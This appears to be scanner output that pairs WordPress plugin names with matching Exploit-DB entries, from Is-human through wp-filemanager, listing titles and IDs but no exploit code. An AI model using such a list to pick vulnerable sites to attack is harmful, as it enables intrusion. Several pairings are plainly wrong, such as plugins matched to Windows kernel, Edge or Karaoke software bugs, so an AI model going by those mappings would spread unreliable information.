3612. [M] EDB-ID: 17299 "WordPress Plugin Is-human 1.4.2 - Remote Command Execution"
3613. [I] islidex
3614. [I] iwant-one-ihave-one
3615. [M] EDB-ID: 16236 "WordPress Plugin IWantOneButton 3.0.1 - Multiple Vulnerabilities"
3616. [I] jetpack v6.8.1
3617. [M] EDB-ID: 18126 "WordPress Plugin jetpack - 'sharedaddy.php' ID SQL Injection"
3618. [I] jibu-pro
3619. [M] EDB-ID: 45305 "WordPress Plugin Jibu Pro 1.7 - Cross-Site Scripting"
3620. [I] joliprint
3621. [M] EDB-ID: 37176 "WordPress Plugin PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities"
3622. [I] jquery-mega-menu
3623. [M] EDB-ID: 16250 "WordPress Plugin jQuery Mega Menu 1.0 - Local File Inclusion"
3624. [I] jrss-widget
3625. [M] EDB-ID: 34977 "WordPress Plugin jRSS Widget 1.1.1 - 'url' Information Disclosure"
3626. [I] js-appointment
3627. [M] EDB-ID: 17724 "WordPress Plugin Js-appointment 1.5 - SQL Injection"
3628. [I] js_composer
3629. [I] jtrt-responsive-tables
3630. [M] EDB-ID: 43110 "WordPress Plugin JTRT Responsive Tables 4.1 - SQL Injection"
3631. [I] kino-gallery
3632. [I] kish-guest-posting
3633. [I] kittycatfish
3634. [M] EDB-ID: 41919 "WordPress Plugin KittyCatfish 2.2 - SQL Injection"
3635. [I] knews
3636. [M] EDB-ID: 37484 "WordPress Plugin Knews Multilingual Newsletters - Cross-Site Scripting"
3637. [I] knr-author-list-widget
3638. [M] EDB-ID: 17791 "WordPress Plugin KNR Author List Widget 2.0.0 - SQL Injection"
3639. [I] lanoba-social-plugin
3640. [M] EDB-ID: 36326 "WordPress Plugin Lanoba Social 1.0 - 'action' Cross-Site Scripting"
3641. [I] lazy-content-slider
3642. [M] EDB-ID: 40070 "WordPress Plugin Lazy Content Slider 3.4 - Cross-Site Request Forgery (Add Catetory)"
3643. [I] lazy-seo
3644. [M] EDB-ID: 28452 "WordPress Plugin Lazy SEO 1.1.9 - Arbitrary File Upload"
3645. [I] lazyest-gallery
3646. [M] EDB-ID: 35435 "WordPress Plugin Lazyest Gallery 1.0.26 - 'image' Cross-Site Scripting"
3647. [I] lb-mixed-slideshow
3648. [M] EDB-ID: 37418 "WordPress Plugin LB Mixed Slideshow - 'upload.php' Arbitrary File Upload"
3649. [I] leaguemanager
3650. [M] EDB-ID: 24789 "WordPress Plugin LeagueManager 3.8 - SQL Injection"
3651. [I] leenkme
3652. [I] levelfourstorefront
3653. [M] EDB-ID: 38158 "WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php? reqID' SQL Injection"
3654. [M] EDB-ID: 38159 "WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php?reqID' SQL Injection"
3655. [M] EDB-ID: 38160 "WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php?reqID' SQL Injection"
3656. [I] like-dislike-counter-for-posts-pages-and-comments
3657. [M] EDB-ID: 34553 "WordPress Plugin Like Dislike Counter 1.2.3 - SQL Injection"
3658. [I] link-library
3659. [M] EDB-ID: 17887 "WordPress Plugin Link Library 5.2.1 - SQL Injection"
3660. [I] lisl-last-image-slider
3661. [I] livesig
3662. [M] EDB-ID: 17864 "WordPress Plugin Livesig 0.4 - Remote File Inclusion"
3663. [I] localize-my-post
3664. [M] EDB-ID: 45439 "WordPress Plugin Localize My Post 1.0 - Local File Inclusion"
3665. [I] mac-dock-gallery
3666. [M] EDB-ID: 19056 "WordPress Plugin Mac Photo Gallery 2.7 - Arbitrary File Upload"
3667. [I] madebymilk
3668. [M] EDB-ID: 38041 "WordPress Theme Madebymilk - 'id' SQL Injection"
3669. [I] mail-masta
3670. [M] EDB-ID: 40290 "WordPress Plugin Mail Masta 1.0 - Local File Inclusion"
3671. [M] EDB-ID: 41438 "WordPress Plugin Mail Masta 1.0 - SQL Injection"
3672. [I] mailz
3673. [M] EDB-ID: 17866 "WordPress Plugin Mailing List 1.3.2 - Remote File Inclusion"
3674. [M] EDB-ID: 18276 "WordPress Plugin Mailing List - Arbitrary File Download"
3675. [I] media-library-categories
3676. [M] EDB-ID: 17628 "WordPress Plugin Media Library Categories 1.0.6 - SQL Injection"
3677. [I] meenews
3678. [M] EDB-ID: 36340 "WordPress Plugin NewsLetter Meenews 5.1 - 'idnews' Cross-Site Scripting"
3679. [I] membership-simplified-for-oap-members-only
3680. [M] EDB-ID: 41622 "Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download"
3681. [I] mingle-forum
3682. [M] EDB-ID: 15943 "WordPress Plugin mingle forum 1.0.26 - Multiple Vulnerabilities"
3683. [M] EDB-ID: 17894 "WordPress Plugin Mingle Forum 1.0.31 - SQL Injection"
3684. [I] mm-forms-community
3685. [M] EDB-ID: 17725 "WordPress Plugin MM Forms Community 1.2.3 - SQL Injection"
3686. [M] EDB-ID: 18997 "WordPress Plugin MM Forms Community 2.2.6 - Arbitrary File Upload"
3687. [I] monsters-editor-10-for-wp-super-edit
3688. [M] EDB-ID: 37654 "WordPress Plugin Monsters Editor for WP Super Edit - Arbitrary File Upload"
3689. [I] mukioplayer-for-wordpress
3690. [M] EDB-ID: 38755 "WordPress Plugin mukioplayer4wp - 'cid' SQL Injection"
3691. [I] myflash
3692. [M] EDB-ID: 3828 "Microsoft Windows Kernel - 'NtGdiStretchBlt' Pool Buffer Overflow (MS15-097)"
3693. [I] mystat
3694. [M] EDB-ID: 17740 "WordPress Plugin mySTAT 2.6 - SQL Injection"
3695. [I] nextgen-gallery
3696. [M] EDB-ID: 12098 "WordPress Plugin NextGEN Gallery 1.5.1 - Cross-Site Scripting"
3697. [M] EDB-ID: 38178 "WordPress Plugin NextGEN Gallery - 'test-head' Cross-Site Scripting"
3698. [M] EDB-ID: 39100 "WordPress Plugin NextGEN Gallery - 'jqueryFileTree.php' Directory Traversal"
3699. [I] nextgen-smooth-gallery
3700. [M] EDB-ID: 14541 "WordPress Plugin NextGEN Smooth Gallery 0.12 - Blind SQL Injection"
3701. [I] ocim-mp3
3702. [M] EDB-ID: 39498 "WordPress Plugin Ocim MP3 - SQL Injection"
3703. [I] odihost-newsletter-plugin
3704. [M] EDB-ID: 17681 "WordPress Plugin OdiHost NewsLetter 1.0 - SQL Injection"
3705. [I] old-post-spinner
3706. [M] EDB-ID: 16251 "WordPress Plugin OPS Old Post Spinner 2.2.1 - Local File Inclusion"
3707. [I] olimometer
3708. [M] EDB-ID: 40804 "WordPress Plugin Olimometer 2.56 - SQL Injection"
3709. [I] omni-secure-files
3710. [M] EDB-ID: 19009 "WordPress Plugin Omni Secure Files 0.1.13 - Arbitrary File Upload"
3711. [I] oqey-gallery
3712. [M] EDB-ID: 17779 "WordPress Plugin oQey Gallery 0.4.8 - SQL Injection"
3713. [M] EDB-ID: 35288 "WordPress Plugin oQey-Gallery 0.2 - 'tbpv_domain' Cross-Site Scripting"
3714. [I] oqey-headers
3715. [M] EDB-ID: 17730 "WordPress Plugin oQey Headers 0.3 - SQL Injection"
3716. [I] page-flip-image-gallery
3717. [M] EDB-ID: 30084 "WordPress Plugin page-flip-image-gallery - Arbitrary File Upload"
3718. [M] EDB-ID: 7543 "Linux Kernel 2.6.x - 'rds_recvmsg()' Local Information Disclosure"
3719. [I] paid-downloads
3720. [M] EDB-ID: 17797 "WordPress Plugin Paid Downloads 2.01 - SQL Injection"
3721. [M] EDB-ID: 36135 "WordPress Plugin Auctions 1.8.8 - 'wpa_id' SQL Injection"
3722. [I] participants-database
3723. [I] pay-with-tweet.php
3724. [M] EDB-ID: 18330 "WordPress Plugin Pay with Tweet 1.1 - Multiple Vulnerabilities"
3725. [I] paypal-currency-converter-basic-for-woocommerce
3726. [M] EDB-ID: 37253 "WordPress Plugin Paypal Currency Converter Basic For WooCommerce - File Read"
3727. [I] peugeot-music-plugin
3728. [M] EDB-ID: 44737 "WordPress Plugin Peugeot Music - Arbitrary File Upload"
3729. [I] photocart-link
3730. [M] EDB-ID: 39623 "WordPress Plugin Photocart Link 1.6 - Local File Inclusion"
3731. [I] photoracer
3732. [M] EDB-ID: 17720 "WordPress Plugin Photoracer 1.0 - SQL Injection"
3733. [M] EDB-ID: 17731 "WordPress Plugin Photoracer 1.0 - Multiple Vulnerabilities"
3734. [M] EDB-ID: 8961 "WordPress Plugin Photoracer 1.0 - 'id' SQL Injection"
3735. [I] photosmash-galleries
3736. [M] EDB-ID: 35429 "WordPress Plugin PhotoSmash Galleries 1.0.x - 'action' Cross-Site Scripting"
3737. [M] EDB-ID: 38872 "WordPress Plugin PhotoSmash Galleries - 'bwbps-uploader.php' Arbitrary File Upload"
3738. [I] php_speedy_wp
3739. [I] phpfreechat
3740. [M] EDB-ID: 37485 "WordPress Plugin PHPFreeChat - 'url' Cross-Site Scripting"
3741. [I] pica-photo-gallery
3742. [M] EDB-ID: 19016 "WordPress Plugin PICA Photo Gallery 1.0 - Remote File Disclosure"
3743. [M] EDB-ID: 19055 "WordPress Plugin Pica Photo Gallery 1.0 - Arbitrary File Upload"
3744. [I] pictpress
3745. [M] EDB-ID: 4695 "Karaoke Video Creator 2.2.8 - Denial of Service"
3746. [I] picturesurf-gallery
3747. [M] EDB-ID: 37371 "WordPress Plugin Picturesurf Gallery - 'upload.php' Arbitrary File Upload"
3748. [I] placester
3749. [M] EDB-ID: 35562 "WordPress Plugin Placester 0.1 - 'ajax_action' Cross-Site Scripting"
3750. [I] player
3751. [M] EDB-ID: 38458 "WordPress Plugin Spider Video Player - 'theme' SQL Injection"
3752. [I] plg_novana
3753. [I] plugin-dir
3754. [M] EDB-ID: 22853 "WordPress Plugin Facebook Survey 1.0 - SQL Injection"
3755. [I] plugin-newsletter
3756. [M] EDB-ID: 19018 "WordPress Plugin NewsLetter 1.5 - Remote File Disclosure"
3757. [I] podpress
3758. [M] EDB-ID: 38376 "WordPress Plugin podPress - 'playerID' Cross-Site Scripting"
3759. [I] portable-phpmyadmin
3760. [M] EDB-ID: 23356 "WordPress Plugin Portable phpMyAdmin - Authentication Bypass"
3761. [I] post-highlights
3762. [M] EDB-ID: 17790 "WordPress Plugin post highlights 2.2 - SQL Injection"
3763. [I] post-recommendations-for-wordpress
3764. [M] EDB-ID: 37506 "WordPress Plugin Post Recommendations - 'abspath' Remote File Inclusion"
3765. [I] powerhouse-museum-collection-image-grid
3766. [M] EDB-ID: 35287 "WordPress Plugin Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Cross-Site Scripting"
3767. [I] premium_gallery_manager
3768. [I] pretty-link
3769. [M] EDB-ID: 36233 "WordPress Plugin Pretty Link 1.4.56 - Multiple Cross-Site Scripting Vulnerabilities"
3770. [M] EDB-ID: 36408 "WordPress Plugin Pretty Link 1.5.2 - 'pretty-bar.php' Cross-Site Scripting"
3771. [M] EDB-ID: 37196 "WordPress Plugin Pretty Link Lite 1.5.2 - SQL Injection / Cross-Site Scripting"
3772. [M] EDB-ID: 38324 "WordPress Plugin Pretty Link - Cross-Site Scripting"
3773. [I] profiles
3774. [M] EDB-ID: 17739 "WordPress Plugin Profiles 2.0 RC1 - SQL Injection"
3775. [I] proplayer
3776. [M] EDB-ID: 17616 "WordPress Plugin ProPlayer 4.7.7 - SQL Injection"
3777. [M] EDB-ID: 25605 "WordPress Plugin ProPlayer 4.7.9.1 - SQL Injection"
3778. [I] pure-html
3779. [M] EDB-ID: 17758 "WordPress Plugin PureHTML 1.0.0 - SQL Injection"
3780. [I] pw-vc-box-post-layout
3781. [I] pw-vc-news-ticker-post-layout
3782. [I] q-and-a-focus-plus-faq
3783. [M] EDB-ID: 39806 "WordPress Plugin Q and A (Focus Plus) FAQ 1.3.9.7 - Multiple Vulnerabilities"
3784. [I] radykal-fancy-gallery
3785. [M] EDB-ID: 19398 "WordPress Plugin Fancy Gallery 1.2.4 - Arbitrary File Upload"
3786. [I] rating-widget
3787. [I] rb-agency
3788. [M] EDB-ID: 40333 "WordPress Plugin RB Agency 2.4.7 - Local File Disclosure"
3789. [I] rbxgallery
3790. [M] EDB-ID: 19019 "WordPress Plugin RBX Gallery 2.1 - Arbitrary File Upload"
3791. [I] real3d-flipbook
3792. [M] EDB-ID: 40055 "WordPress Plugin Real3D FlipBook - Multiple Vulnerabilities"
3793. [I] really-easy-slider
3794. [I] really-simple-guest-post
3795. [M] EDB-ID: 37209 "WordPress Plugin Really Simple Guest Post 1.0.6 - Local File Inclusion"
3796. [I] recent-backups
3797. [M] EDB-ID: 37752 "WordPress Plugin Recent Backups 0.7 - Arbitrary File Download"
3798. [I] recipe
3799. [M] EDB-ID: 31228 "WordPress Plugin Recipes Blog - 'id' SQL Injection"
3800. [I] reciply
3801. [M] EDB-ID: 35265 "WordPress Plugin Recip.ly 1.1.7 - 'uploadImage.php' Arbitrary File Upload"
3802. [I] reflex-gallery
3803. [M] EDB-ID: 36374 "WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload"
3804. [I] rekt-slideshow
3805. [I] related-sites
3806. [M] EDB-ID: 9054 "Adobe Flash TextField.tabIndex Setter - Use-After-Free"
3807. [I] relocate-upload
3808. [M] EDB-ID: 17869 "WordPress Plugin Relocate Upload 0.14 - Remote File Inclusion"
3809. [I] rent-a-car
3810. [I] resume-submissions-job-postings
3811. [M] EDB-ID: 19791 "WordPress Plugin Resume Submissions & Job Postings 2.5.1 - Unrestricted Arbitrary File Upload"
3812. [I] revslider
3813. [I] rich-widget
3814. [M] EDB-ID: 37653 "WordPress Plugin Rich Widget - Arbitrary File Upload"
3815. [I] ripe-hd-player
3816. [M] EDB-ID: 24229 "WordPress Plugin Ripe HD FLV Player - SQL Injection"
3817. [I] robotcpa
3818. [M] EDB-ID: 37252 "WordPress Plugin RobotCPA V5 - Local File Inclusion"
3819. [I] rss-feed-reader
3820. [M] EDB-ID: 35261 "WordPress Plugin RSS Feed Reader 0.1 - 'rss_url' Cross-Site Scripting"
3821. [I] s3bubble-amazon-s3-html-5-video-with-adverts
3822. [M] EDB-ID: 37494 "WordPress Plugin S3Bubble Cloud Video With Adverts & Analytics 0.7 - Arbitrary File Download"
3823. [I] scormcloud
3824. [M] EDB-ID: 17793 "WordPress Plugin SCORM Cloud 1.0.6.6 - SQL Injection"
3825. [I] se-html5-album-audio-player
3826. [M] EDB-ID: 37274 "WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal"
3827. [I] search-autocomplete
3828. [M] EDB-ID: 17767 "WordPress Plugin SearchAutocomplete 1.0.8 - SQL Injection"
3829. [I] securimage-wp
3830. [M] EDB-ID: 38510 "WordPress Plugin Securimage-WP - 'siwp_test.php' Cross-Site Scripting"
3831. [I] sell-downloads
3832. [M] EDB-ID: 38868 "WordPress Plugin Sell Download 1.0.16 - Local File Disclosure"
3833. [I] sendit
3834. [M] EDB-ID: 17716 "WordPress Plugin SendIt 1.5.9 - Blind SQL Injection"
3835. [I] seo-automatic-seo-tools
3836. [M] EDB-ID: 34975 "WordPress Plugin SEO Tools 3.0 - 'file' Directory Traversal"
3837. [I] seo-watcher
3838. [M] EDB-ID: 38782 "WordPress Plugin SEO Watcher - 'ofc_upload_image.php' Arbitrary PHP Code Execution"
3839. [I] sermon-browser
3840. [M] EDB-ID: 17214 "WordPress Plugin SermonBrowser 0.43 - SQL Injection"
3841. [M] EDB-ID: 35657 "WordPress Plugin Sermon Browser 0.43 - Cross-Site Scripting / SQL Injection"
3842. [I] sexy-contact-form
3843. [M] EDB-ID: 34922 "WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload"
3844. [M] EDB-ID: 35057 "WordPress Plugin 0.9.7 / Joomla! Component 2.0.0 Creative Contact Form - Arbitrary File Upload"
3845. [I] sf-booking
3846. [M] EDB-ID: 43475 "WordPress Plugin Service Finder Booking < 3.2 - Local File Disclosure"
3847. [I] sfbrowser
3848. [M] EDB-ID: 19054 "WordPress Plugin SfBrowser 1.4.5 - Arbitrary File Upload"
3849. [I] sfwd-lms
3850. [I] sh-slideshow
3851. [M] EDB-ID: 17748 "WordPress Plugin SH Slideshow 3.1.4 - SQL Injection"
3852. [I] sharebar
3853. [M] EDB-ID: 37201 "WordPress Plugin Sharebar 1.2.1 - SQL Injection / Cross-Site Scripting"
3854. [I] si-contact-form
3855. [M] EDB-ID: 36050 "WordPress Plugin Fast Secure Contact Form 3.0.3.1 - 'index.php' Cross-Site Scripting"
3856. [I] simple-ads-manager
3857. [M] EDB-ID: 36613 "WordPress Plugin Simple Ads Manager - Multiple SQL Injections"
3858. [M] EDB-ID: 36614 "WordPress Plugin Simple Ads Manager 2.5.94 - Arbitrary File Upload"
3859. [M] EDB-ID: 36615 "WordPress Plugin Simple Ads Manager - Information Disclosure"
3860. [M] EDB-ID: 39133 "WordPress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection"
3861. [I] simple-download-button-shortcode
3862. [M] EDB-ID: 19020 "WordPress Plugin Simple Download Button ShortCode 1.0 - Remote File Disclosure"
3863. [I] simple-fields
3864. [M] EDB-ID: 44425 "WordPress Plugin Simple Fields 0.2 - 0.3.5 - Local/Remote File Inclusion / Remote Code Execution"
3865. [I] simple-forum
3866. [I] site-editor
3867. [M] EDB-ID: 44340 "Wordpress Plugin Site Editor 1.1.1 - Local File Inclusion"
3868. [I] site-import
3869. [M] EDB-ID: 39558 "WordPress Plugin Site Import 1.0.1 - Local/Remote File Inclusion"
3870. [I] skysa-official
3871. [M] EDB-ID: 36363 "WordPress Plugin Skysa App Bar - 'idnews' Cross-Site Scripting"
3872. [I] slider-image
3873. [M] EDB-ID: 37361 "WordPress Plugin Huge-IT Slider 2.7.5 - Multiple Vulnerabilities"
3874. [I] slideshow-gallery-2
3875. [M] EDB-ID: 36631 "WordPress Plugin Slideshow Gallery 1.1.x - 'border' Cross-Site Scripting"
3876. [I] slideshow-jquery-image-gallery
3877. [M] EDB-ID: 37948 "WordPress Plugin Slideshow - Multiple Cross-Site Scripting Vulnerabilities"
3878. [I] smart-flv
3879. [M] EDB-ID: 38331 "WordPress Plugin Smart Flv - 'jwplayer.swf' Multiple Cross-Site Scripting Vulnerabilities"
3880. [I] smart-google-code-inserter
3881. [I] sniplets
3882. [M] EDB-ID: 5194 "Wansview 1.0.2 - Denial of Service (PoC)"
3883. [I] social-discussions
3884. [M] EDB-ID: 22158 "WordPress Plugin social discussions 6.1.1 - Multiple Vulnerabilities"
3885. [I] social-slider-2
3886. [M] EDB-ID: 17617 "WordPress Plugin Social Slider 5.6.5 - SQL Injection"
3887. [I] socialfit
3888. [M] EDB-ID: 37481 "WordPress Plugin SocialFit - 'msg' Cross-Site Scripting"
3889. [I] sodahead-polls
3890. [I] sp-client-document-manager
3891. [M] EDB-ID: 35313 "WordPress Plugin SP Client Document Manager 2.4.1 - SQL Injection"
3892. [M] EDB-ID: 36576 "WordPress Plugin SP Project & Document Manager 2.5.3 - Blind SQL Injection"
3893. [I] spicy-blogroll
3894. [M] EDB-ID: 26804 "WordPress Plugin Spicy Blogroll - Local File Inclusion"
3895. [I] spider-event-calendar
3896. [M] EDB-ID: 25723 "WordPress Plugin Spider Event Calendar 1.3.0 - Multiple Vulnerabilities"
3897. [I] spiffy
3898. [M] EDB-ID: 38441 "WordPress Plugin Spiffy XSPF Player - 'playlist_id' SQL Injection"
3899. [I] st_newsletter
3900. [M] EDB-ID: 31096 "WordPress Plugin ShiftThis NewsLetter - SQL Injection"
3901. [M] EDB-ID: 6777 "Free Download Manager 2.5 Build 758 - Remote Control Server Buffer Overflow (Metasploit)"
3902. [I] store-locator-le
3903. [M] EDB-ID: 18989 "WordPress Plugin Google Maps via Store Locator 2.7.1 < 3.0.1 - Multiple Vulnerabilities"
3904. [I] taggator
3905. [I] taggedalbums
3906. [M] EDB-ID: 38023 "WordPress Plugin Tagged Albums - 'id' SQL Injection"
3907. [I] tagninja
3908. [M] EDB-ID: 35300 "WordPress Plugin TagNinja 1.0 - 'id' Cross-Site Scripting"
3909. [I] tera-charts
3910. [M] EDB-ID: 39256 "WordPress Plugin Tera Charts (tera-charts) - '/charts/treemap.php?fn' Directory Traversal"
3911. [M] EDB-ID: 39257 "WordPress Plugin Tera Charts (tera-charts) - '/charts/zoomabletreemap.php?fn' Directory Traversal"
3912. [I] the-welcomizer
3913. [M] EDB-ID: 36445 "WordPress Plugin The Welcomizer 1.3.9.4 - 'twiz-index.php' Cross-Site Scripting"
3914. [I] thecartpress
3915. [M] EDB-ID: 17860 "WordPress Plugin TheCartPress 1.1.1 - Remote File Inclusion"
3916. [M] EDB-ID: 36481 "WordPress Plugin TheCartPress 1.6 - 'OptionsPostsList.php' Cross-Site Scripting"
3917. [M] EDB-ID: 38869 "WordPress Plugin TheCartPress 1.4.7 - Multiple Vulnerabilities"
3918. [I] thinkun-remind
3919. [M] EDB-ID: 19021 "WordPress Plugin Thinkun Remind 1.1.3 - Remote File Disclosure"
3920. [I] tinymce-thumbnail-gallery
3921. [M] EDB-ID: 19022 "WordPress Plugin TinyMCE Thumbnail Gallery 1.0.7 - Remote File Disclosure"
3922. [I] topquark
3923. [M] EDB-ID: 19053 "WordPress Plugin Top Quark Architecture 2.10 - Arbitrary File Upload"
3924. [I] track-that-stat
3925. [M] EDB-ID: 37204 "WordPress Plugin Track That Stat 1.0.8 - Cross-Site Scripting"
3926. [I] trafficanalyzer
3927. [M] EDB-ID: 38439 "WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting"
3928. [I] tune-library
3929. [M] EDB-ID: 17816 "WordPress Plugin Tune Library 2.17 - SQL Injection"
3930. [I] ucan-post
3931. [M] EDB-ID: 18390 "WordPress Plugin ucan post 1.0.09 - Persistent Cross-Site Scripting"
3932. [I] ultimate-product-catalogue
3933. [M] EDB-ID: 36823 "WordPress Plugin Ultimate Product Catalogue - SQL Injection (1)"
3934. [M] EDB-ID: 36824 "WordPress Plugin Ultimate Product Catalogue - SQL Injection (2)"
3935. [M] EDB-ID: 36907 "WordPress Plugin Ultimate Product Catalogue 3.1.2 - Multiple Persistent Cross-Site Scripting / Cross-Site Request Forgery / Arbitrary File Upload Vulnerabilities"
3936. [M] EDB-ID: 39974 "WordPress Plugin Ultimate Product Catalog 3.8.1 - Privilege Escalation"
3937. [M] EDB-ID: 40012 "WordPress Plugin Ultimate Product Catalog 3.8.6 - Arbitrary File Upload"
3938. [M] EDB-ID: 40174 "WordPress Plugin Ultimate Product Catalog 3.9.8 - do_shortcode via ajax Blind SQL Injection"
3939. [I] ungallery
3940. [M] EDB-ID: 17704 "WordPress Plugin UnGallery 1.5.8 - Local File Disclosure"
3941. [I] uploader
3942. [M] EDB-ID: 35255 "WordPress Plugin Uploader 1.0 - 'num' Cross-Site Scripting"
3943. [M] EDB-ID: 38163 "WordPress Plugin Uploader - Arbitrary File Upload"
3944. [M] EDB-ID: 38355 "WordPress Plugin Uploader - 'blog' Cross-Site Scripting"
3945. [I] uploadify-integration
3946. [M] EDB-ID: 37070 "WordPress Plugin Uploadify Integration 0.9.6 - Multiple Cross-Site Scripting Vulnerabilities"
3947. [I] uploads
3948. [I] upm-polls
3949. [M] EDB-ID: 17627 "WordPress Plugin UPM Polls 1.0.3 - SQL Injection"
3950. [I] user-avatar
3951. [I] user-meta
3952. [M] EDB-ID: 19052 "WordPress Plugin User Meta 1.1.1 - Arbitrary File Upload"
3953. [I] userpro
3954. [M] EDB-ID: 46083 "Wordpress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation"
3955. [I] users-ultra
3956. [I] vc-extensions-bundle
3957. [I] verve-meta-boxes
3958. [I] videowhisper-live-streaming-integration
3959. [M] EDB-ID: 31986 "WordPress Plugin VideoWhisper 4.27.3 - Multiple Vulnerabilities"
3960. [I] videowhisper-video-conference-integration
3961. [M] EDB-ID: 36617 "WordPress Plugin VideoWhisper Video Presentation 3.31.17 - Arbitrary File Upload"
3962. [M] EDB-ID: 36618 "WordPress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload"
3963. [I] videowhisper-video-presentation
3964. [M] EDB-ID: 17771 "WordPress Plugin VideoWhisper Video Presentation 1.1 - SQL Injection"
3965. [M] EDB-ID: 37357 "WordPress Plugin VideoWhisper Video Presentation 3.17 - 'vw_upload.php' Arbitrary File Upload"
3966. [I] vk-gallery
3967. [I] vodpod-video-gallery
3968. [M] EDB-ID: 34976 "WordPress Plugin Vodpod Video Gallery 3.1.5 - 'vodpod_gallery_thumbs.php' Cross-Site Scripting"
3969. [I] wassup
3970. [I] webinar_plugin
3971. [M] EDB-ID: 22300 "WordPress Plugin Easy Webinar - Blind SQL Injection"
3972. [I] webplayer
3973. [I] website-contact-form-with-file-upload
3974. [M] EDB-ID: 36952 "WordPress Plugin N-Media Website Contact Form with File Upload 1.5 - Local File Inclusion"
3975. [I] website-faq
3976. [M] EDB-ID: 19400 "WordPress Plugin Website FAQ 1.0 - SQL Injection"
3977. [I] wechat-broadcast
3978. [M] EDB-ID: 45438 "WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion"
3979. [I] woocommerce
3980. [M] EDB-ID: 43196 "WordPress Plugin WooCommerce 2.0/3.0 - Directory Traversal"
3981. [I] woopra
3982. [M] EDB-ID: 38783 "WordPress Plugin Woopra Analytics - 'ofc_upload_image.php' Arbitrary PHP Code Execution"
3983. [I] wordpress-donation-plugin-with-goals-and-paypal-ipn-by-nonprofitcmsorg
3984. [M] EDB-ID: 17763 "Microsoft Edge 44.17763.1.0 - NULL Pointer Dereference"
3985. [I] wordpress-member-private-conversation
3986. [M] EDB-ID: 37353 "WordPress Plugin Nmedia WordPress Member Conversation 1.35.0 - 'doupload.php' Arbitrary File Upload"
3987. [I] wordpress-processing-embed
3988. [M] EDB-ID: 35066 "WordPress Plugin Processing Embed 0.5 - 'pluginurl' Cross-Site Scripting"
3989. [I] wordtube
3990. [M] EDB-ID: 3825 "GoodiWare GoodReader iPhone - '.XLS' Denial of Service"
3991. [I] work-the-flow-file-upload
3992. [M] EDB-ID: 36640 "WordPress Plugin Work The Flow File Upload 2.5.2 - Arbitrary File Upload"
3993. [I] wp-adserve
3994. [I] wp-audio-gallery-playlist
3995. [M] EDB-ID: 17756 "WordPress Plugin Audio Gallery Playlist 0.12 - SQL Injection"
3996. [I] wp-automatic
3997. [M] EDB-ID: 19187 "WordPress Plugin Automatic 2.0.3 - SQL Injection"
3998. [I] wp-autosuggest
3999. [M] EDB-ID: 45977 "WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection"
4000. [I] wp-autoyoutube
4001. [M] EDB-ID: 18353 "WordPress Plugin wp-autoyoutube - Blind SQL Injection"
4002. [I] wp-bannerize
4003. [M] EDB-ID: 17764 "WordPress Plugin Bannerize 2.8.6 - SQL Injection"
4004. [M] EDB-ID: 17906 "WordPress Plugin Bannerize 2.8.7 - SQL Injection"
4005. [M] EDB-ID: 36193 "WordPress Plugin WP Bannerize 2.8.7 - 'ajax_sorter.php' SQL Injection"
4006. [I] wp-banners-lite
4007. [M] EDB-ID: 38410 "WordPress Plugin Banners Lite - 'wpbanners_show.php' HTML Injection"
4008. [I] wp-booking-calendar
4009. [M] EDB-ID: 44769 "Wordpress Plugin Booking Calendar 3.0.0 - SQL Injection / Cross-Site Scripting"
4010. [I] wp-business-intelligence
4011. [M] EDB-ID: 36600 "WordPress Plugin Business Intelligence - SQL Injection (Metasploit)"
4012. [I] wp-business-intelligence-lite
4013. [I] wp-cal
4014. [M] EDB-ID: 4992 "Sun xVM VirtualBox 2.2 < 3.0.2 r49928 - Local Host Reboot (Denial of Service) (PoC)"
4015. [I] wp-comment-remix
4016. [I] wp-content
4017. [M] EDB-ID: 37123 "WordPress Plugin WPsc MijnPress - 'rwflush' Cross-Site Scripting"
4018. [I] wp-copysafe-pdf
4019. [M] EDB-ID: 39254 "WordPress Plugin CopySafe PDF Protection - Arbitrary File Upload"
4020. [I] wp-cumulus
4021. [M] EDB-ID: 10228 "WordPress Plugin WP-Cumulus 1.20 - Full Path Disclosure / Cross-Site Scripting"
4022. [M] EDB-ID: 33371 "WordPress Plugin WP-Cumulus 1.x - 'tagcloud.swf' Cross-Site Scripting"
4023. [I] wp-custom-pages
4024. [M] EDB-ID: 17119 "WordPress Plugin Custom Pages 0.5.0.1 - Local File Inclusion"
4025. [I] wp-ds-faq
4026. [M] EDB-ID: 17683 "WordPress Plugin DS FAQ 1.3.2 - SQL Injection"
4027. [I] wp-e-commerce
4028. [M] EDB-ID: 36018 "WordPress Plugin WP E-Commerce 3.8.6 - 'cart_messages[]' Cross-Site Scripting"
4029. [I] wp-easycart
4030. [M] EDB-ID: 35730 "WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload"
4031. [I] wp-ecommerce-shop-styling
4032. [M] EDB-ID: 37530 "WordPress Plugin WP E-Commerce Shop Styling 2.5 - Arbitrary File Download"
4033. [I] wp-events-calendar
4034. [M] EDB-ID: 44785 "WordPress Plugin Events Calendar - SQL Injection"
4035. [I] wp-featured-post-with-thumbnail
4036. [M] EDB-ID: 35262 "WordPress Plugin WP Featured Post with Thumbnail 3.0 - 'src' Cross-Site Scripting"
4037. [I] wp-filebase
4038. [M] EDB-ID: 17808 "WordPress Plugin WP-Filebase Download Manager 0.2.9 - SQL Injection"
4039. [I] wp-filemanager
4040. [M] EDB-ID: 25440 "WordPress Plugin wp-FileManager - Arbitrary File Download"
4041. [M] EDB-ID: 38515 "WordPress Plugin wp-FileManager - 'path' Arbitrary File Download"
4042. [M] EDB-ID: 4844 "STDU Explorer 1.0.201 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution"
